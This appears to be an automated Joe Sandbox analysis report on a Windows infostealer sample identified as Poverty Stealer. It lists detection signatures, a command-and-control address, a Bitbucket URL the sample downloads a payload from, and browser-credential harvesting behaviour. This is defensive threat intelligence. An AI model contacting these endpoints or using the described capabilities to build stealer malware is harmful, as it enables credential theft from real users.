Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
Analysis ID:1467090
MD5:da4b6f39fc024d2383d4bfe7f67f1ee1
SHA1:7cc975d9ff785e269163897907d0b9b3cee29956
SHA256:544697a024abaea1b24eaa3d89869b2c8a4c1acf96d4e152f5632d338d054c9e
Tags:exePovertyStealer
Infos:

Detection

Poverty Stealer
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Poverty Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
{"C2 url": "146.70.169.164:2227"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
    00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
      Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe PID: 6500JoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.unpackJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
          0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.raw.unpackJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
            0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.unpackJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
              0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.unpackJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
                0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.raw.unpackJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
                  Click to see the 1 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.raw.unpackMalware Configuration Extractor: Poverty Stealer {"C2 url": "146.70.169.164:2227"}
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeReversingLabs: Detection: 42%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F1C94 CryptUnprotectData,CryptProtectData,0_2_038F1C94
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49705 version: TLS 1.2
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127982661.000000000ADA3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF51000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E90E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2114502255.000000000A360000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2112042713.000000000A0B8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2118866221.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B55D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF58000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E900000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntkrnlmp.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E90E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ..pdbd source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2217953373.000000000DD83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2232450057.000000000E65E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2249922214.000000000EF30000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2196463844.000000000D505000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2265708286.000000000F7B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2184249789.000000000CC2A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2133914078.000000000B291000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2124729580.000000000AB3E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2151669338.000000000BAFA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2162785923.000000000C3B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntkrnlmp.pdbx6 source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF51000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2114502255.000000000A360000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2112042713.000000000A0B8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2118866221.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E900000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Desktop\projects\Release\BigProject.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188930924.000000000CFA6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Desktop\projects\Release\BigProject.pdb. source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007E24BD FindFirstFileExW,0_2_007E24BD
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F1000 FindFirstFileW,FindNextFileW,EnterCriticalSection,LeaveCriticalSection,0_2_038F1000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F4E27 FindFirstFileW,EnterCriticalSection,LeaveCriticalSection,FindNextFileW,0_2_038F4E27
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F1D3C FindFirstFileW,FindNextFileW,0_2_038F1D3C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F40BA FindFirstFileW,FindNextFileW,0_2_038F40BA
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F3EFC FindFirstFileW,FindNextFileW,0_2_038F3EFC
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: 146.70.169.164:2227
                  Source: global trafficTCP traffic: 192.168.2.7:49707 -> 146.70.169.164:2227
                  Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
                  Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
                  Source: Joe Sandbox ViewIP Address: 146.70.169.164 146.70.169.164
                  Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 146.70.169.164
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_00775B80 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,InternetOpenA,FreeLibrary,_strlen,InternetOpenUrlA,FreeLibrary,task,InternetReadFile,FreeLibrary,task,0_2_00775B80
                  Source: global trafficHTTP traffic detected: GET /fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupee HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
                  Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001240000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupee
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49705 version: TLS 1.2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F4BA2 GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,DeleteObject,DeleteDC,ReleaseDC,0_2_038F4BA2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007D14900_2_007D1490
